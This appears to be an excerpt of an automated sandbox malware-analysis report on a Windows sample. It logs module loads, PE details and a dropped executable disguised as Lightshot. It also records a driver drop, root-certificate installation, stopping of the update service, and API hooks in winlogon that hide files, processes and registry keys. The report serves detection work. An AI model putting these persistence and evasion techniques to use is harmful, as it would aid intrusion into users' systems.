          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: nW2oopMIdg.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: nW2oopMIdg.exeStatic file information: File size 2876416 > 1048576
          Source: nW2oopMIdg.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x2b2000
          Source: nW2oopMIdg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp
          Source: nW2oopMIdg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: nW2oopMIdg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: nW2oopMIdg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: nW2oopMIdg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: nW2oopMIdg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_00000001408460F0
          Source: nW2oopMIdg.exeStatic PE information: section name: .00cfg
          Source: Lightshot.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB901394 push qword ptr [00007FF7EB90E004h]; ret 0_2_00007FF7EB901403
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E85896ACDD push rcx; retf 003Fh31_2_000001E85896ACDE
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E85899C6DD push rcx; retf 003Fh31_2_000001E85899C6DE
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589CACDD push rcx; retf 003Fh31_2_000001E8589CACDE
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C81394 push qword ptr [00007FF7B1C8E004h]; ret 36_2_00007FF7B1C81403
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140ADFDACDD push rcx; retf 003Fh39_2_00000140ADFDACDE
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE87C6DD push rcx; retf 003Fh39_2_00000140AE87C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5AACDD push rcx; retf 003Fh40_2_00000195DD5AACDE
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5DC6DD push rcx; retf 003Fh40_2_00000195DD5DC6DE
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA2ACDD push rcx; retf 003Fh41_2_000001160CA2ACDE
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA5C6DD push rcx; retf 003Fh41_2_000001160CA5C6DE
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E108ACDD push rcx; retf 003Fh66_2_00000257E108ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10BC6DD push rcx; retf 003Fh66_2_00000257E10BC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1EACDD push rcx; retf 003Fh67_2_000001F28C1EACDE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C94C6DD push rcx; retf 003Fh67_2_000001F28C94C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FEACDD push rcx; retf 003Fh68_2_000001CA97FEACDE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9855C6DD push rcx; retf 003Fh68_2_000001CA9855C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652FACDD push rcx; retf 003Fh69_2_000001D2652FACDE
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26532C6DD push rcx; retf 003Fh69_2_000001D26532C6DE

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\TEMP\yycjbdwxjaoe.sysJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\Temp\yycjbdwxjaoe.sysJump to dropped file
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeFile created: C:\ProgramData\Screenshots\Lightshot.exeJump to dropped file
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeFile created: C:\ProgramData\Screenshots\Lightshot.exeJump to dropped file
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\Temp\yycjbdwxjaoe.sysJump to dropped file
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hooks files or directories query functions (used to hide files and directories)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Hooks processes query functions (used to hide processes)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Hooks registry keys query functions (used to hide registry keys)
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
